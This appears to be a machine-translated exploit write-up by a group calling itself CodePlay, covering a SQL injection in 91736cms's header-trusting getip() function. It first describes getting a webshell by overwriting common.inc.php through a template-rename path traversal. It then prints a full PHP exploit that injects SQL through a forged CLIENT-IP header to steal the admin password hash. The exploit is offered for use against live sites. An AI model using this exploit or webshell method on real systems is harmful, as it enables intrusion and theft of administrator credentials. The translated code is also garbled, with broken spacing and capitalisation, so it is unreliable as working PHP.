91736cms Getip SQL Injection & amp; WebShell

Author: Yaseng & Desperado
 
Team: CodePlay
 
Reading the source code in Chinaz reveals the evil GetIp ()
 
// Obtain the IP address
Function getip (){
If (getenv ("HTTP_CLIENT_IP ")){
$ Httpip = getenv ("HTTP_CLIENT_IP ");
Return $ httpip;
}
If (getenv ("HTTP_X_FORWARDED_FOR ")){
$ Httpip = getenv ("HTTP_X_FORWARDED_FOR ");
Return $ httpip;
}
If (getenv ("HTTP_X_FORWARDED ")){
$ Httpip = getenv ("HTTP_X_FORWARDED ");
Return $ httpip;
}
If (getenv ("HTTP_FORWARDED_FOR ")){
$ Httpip = getenv ("HTTP_FORWARDED_FOR ");
Return $ httpip;
}
If (getenv ("HTTP_FORWARDED ")){
$ Httpip = getenv ("HTTP_FORWARDED ");
Return $ httpip;
}
$ Httpip = $ _ SERVER ['remote _ ADDR '];
Return $ httpip;
}
Many cms are dead here
 
The principles of Baidu
 
Use curl in the command line
 
1. Open php. ini and enable extension = php_curl.dll.
 
2. Check the directory of the extension_dir value of php. ini and whether php_curl.dll exists,
If not, download php_curl.dll and copy libeay32.dll and ssleay32.dll from the php Directory
C: \ windows \ system32
 
Give exp directly
 
For details, see the attachment 91736.php.
 
Operation demonstration
 
 
 
I admit that the previous technology is very old.
 
Something new
 
The above tmd5 cracking requires money. I used the local demo to get the shell in the background and came to the background getShell.
 
Happy to see bird template Management
 
 
 
Click to edit
 
Visual Testing is the Smarty template engine.
 
{Php}
 
Phpinfo ();
 
{/Php}
 
 
 
Since Shit prohibits bird php labels
 
 
 
Can you change the template file name?
 
Tamper check the post package
 
 
 
Index.html is 1.php
 
 
 
Tragedy. You have to find out how to overwrite the PHP file.
 
The template directory is in the system \ templates \ default12 directory
 
Find a php file common. inc. php In system
 
Cover his sister's
 
Change the file in tamper to ../common. inc. php.
 
View common. inc. php
 
 
 
 
 
Successfully written to php (ps: This method is cumbersome
Will make the website rotten
We recommend that you replace or
I got a sentence and recovered it.) I tested the website and found that the latest version had an error.
 
I have time to study it.
 
Done !!!
 
CodePlay code audit exchange group 209547366 (common progress)
 
91736. php
 
<? Php
Print_r ('
+ --------------------------------------------------------------------------- +
91736CMS Getip () Remote SQL Injection Exploit
By CodePlay Team (Yaseng & Desperado)
If expoit success you can see get admin pass
+ --------------------------------------------------------------------------- +
');
If ($ argc <4)
{
Print_r ('
+ --------------------------------------------------------------------------- +
Example:
Php '. $ argv [0]. 'localhost name pass
+ --------------------------------------------------------------------------- +
');
Exit;
}
Error_reporting (3 );
Ini_set ('max _ execution_time ', 0 );
$ Host = $ argv [1];
$ Username = $ argv [2];
$ Password = $ argv [3];
// Register a user
$ StyleUrl = $ host. "/index. php? M = member & f = register_save ";
$ StyleData = "username = {$ username} & password = {$ password} & password2 = {$ password} & fields % 5 Btruename % 5D = {$ username} & fields % 5 bemail % 5D = {$ username} & submit = + % D7 % A2 + % B2 % E1 + ";
$ Ch = curl_init ($ styleUrl );
Curl_setopt ($ ch, CURLOPT_HEADER, 0 );
Curl_setopt ($ ch, CURLOPT_RETURNTRANSFER, 1 );
Curl_setopt ($ ch, CURLOPT_POSTFIELDS, $ styleData );
Curl_setopt ($ ch, CURLOPT_POST, 1 );
$ Token = curl_exec ($ ch );
Curl_close ($ ch );
$ Cookie_file = tempnam ('./temp', 'cooker ');
$ Site = $ host;
$ Post_fields = "username = {$ username} & password = {$ password} & button = + % B5 % C7 % C2 % BC + ";
// Login packet www.2cto.com
$ Login_url = $ site. "/index. php? M = member & f = login_save ";
$ Cookie_file = tempnam ('./temp', 'cooker ');
$ Ch = curl_init ($ login_url );
Curl_setopt ($ ch, CURLOPT_HEADER, 0 );
Curl_setopt ($ ch, CURLOPT_RETURNTRANSFER, 1 );
Curl_setopt ($ ch, CURLOPT_HTTPHEADER, array ('x-FORWARDED-FOR: fuck ', "CLIENT-IP: fuck by C.P. t', 'email '= (SELECT password FROM 'C _ admin'), 'logins' = 4 WHERE 'username' =' $ username '#"));
// Construct an IP address
Curl_setopt ($ ch, CURLOPT_POST, 1 );
Curl_setopt ($ ch, CURLOPT_POSTFIELDS, $ post_fields );
Curl_setopt ($ ch, CURLOPT_COOKIEJAR, $ cookie_file );
Curl_exec ($ ch );
Curl_close ($ ch );
$ StyleUrl = $ host. "/index. php? M = member & f = edit ";
$ StyleData = "";
$ Ch = curl_init ($ styleUrl );
Curl_setopt ($ ch, CURLOPT_HEADER, 0 );
Curl_setopt ($ ch, CURLOPT_RETURNTRANSFER, 1 );
Curl_setopt ($ ch, CURLOPT_COOKIEFILE, $ cookie_file );
Curl_setopt ($ ch, CURLOPT_POSTFIELDS, $ styleData );
Curl_setopt ($ ch, CURLOPT_POST, 1 );
$ Data = curl_exec ($ ch );
Curl_close ($ ch );
$ Regex = "/id = \" email \ "(. *) <\/td>/I ";
Preg_match ($ regex, $ data, $ result );
$ Regex = "/value = \"(.*)\"/";
If (preg_match ($ regex, $ result [0], $ pass )){
Echo "shit pass:". $ pass [1]. "and login the admin Panel to getShell ";
}
Else {
Echo "fuck !!! You are field ";
}
?>